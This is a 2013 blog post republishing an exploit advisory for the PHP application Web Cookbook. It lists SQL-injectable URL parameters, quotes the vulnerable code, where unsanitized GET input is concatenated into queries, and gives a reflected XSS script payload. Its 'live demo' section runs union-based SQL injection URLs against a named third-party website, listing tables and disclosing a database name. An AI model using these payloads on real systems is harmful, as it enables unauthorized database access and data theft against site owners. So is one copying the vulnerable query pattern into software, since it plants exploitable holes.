Web Cookbook SQL Injection / XSS

Posted by Saadi On Tuesday, 12 March 2013 1 comments
Exploit Links: 

http://www.exploit-db.com/exploits/24742/

http://packetstormsecurity.com/files/120760/Web-Cookbook-SQL-Injection.html

http://1337day.com/exploit/20501

Exploit

# Exploit Title: Web Cookbook Multiple SQL Injection
# Date: 2013/3/12
# Exploit Author: Saadat Ullah , saadi_linux@rocketmail.com
# Software Link: http://sourceforge.net/projects/webcookbook/
# Author HomePage: http://security-geeks.blogspot.com/
# Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3

# SQL Injection

http://localhost/cook/searchrecipe.php?sstring=[SQLi]
http://localhost/cook/showtext.php?mode=[SQLi]
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=


http://localhost/cook/showtext.php?mode=[SQLi]
#Proof Of Concept
In showtext.php
Code:
$mode = $_GET["mode"];
.
.
showText($mode, $art);//sending $mode to a function without sanitizing it
.
.
function showText($kategorie, $art) {
initDB();
echo "<div class=\"rdisplay\">\n";
$query = "SELECT * FROM dat_texte WHERE id = $kategorie"; //using a non sanitize field in the querry
$result = mysql_query($query);
.
.
All GET Fields Are Vuln To SQLi
http://localhost/cook/searchrecipe.php?mode=1&title=[SQLi]&prefix=&preparation=&postfix=&tipp=&ingredient=
#p0c
In searchrecipe.php
$title = $_GET['title'];
$prefix = $_GET['prefix'];
$preparation = $_GET['preparation'];
$postfix = $_GET['postfix'];
$tipp = $_GET['tipp'];
$ingredient = $_GET['ingredient'];
.
.
.
if ($title != "") {
$sstring = "a.title LIKE '%$title%' ";
}
.
.
searchRecipe($mode, $sstring);
.
.
In Function SearchRecipe
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


http://localhost/cook/searchrecipe.php?sstring=[SQLi]
P0c
$sstring = $_GET['sstring'];
if ($sstring != "") {
searchRecipe(0, $sstring);
.
.
.
$query = "SELECT DISTINCT a.id, a.title FROM das_rezept a, dat_ingredient b WHERE a.title LIKE '%$sstring%' OR b.description LIKE '%$sstring%' AND a.id = b.recipe ORDER BY a.title";


A simple Non-Presistent XSS
http://localhost/cook/searchrecipe.php?mode=1&title=<script>alert('hi');</script>&prefix=&preparation=&postfix=&tipp=&ingredient=


#Independent Pakistani Security Researcher

Exploit Live Demo
kochen.joachim-gabel.de/showtext.php?mode=603' [Union Based Injection]

Database Name:
db394647325

http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,table_name,4,5%20from%20information_schema.tables%20where%20table_schema=database%28%29--

 http://www.kochen.joachim-gabel.de/showtext.php?mode=-603%20union%20select%201,2,database%28%29,4,5--
etc...

1 comments:

Pablo M. said...

Thanks very much for such a good article. Lexy

Post a Comment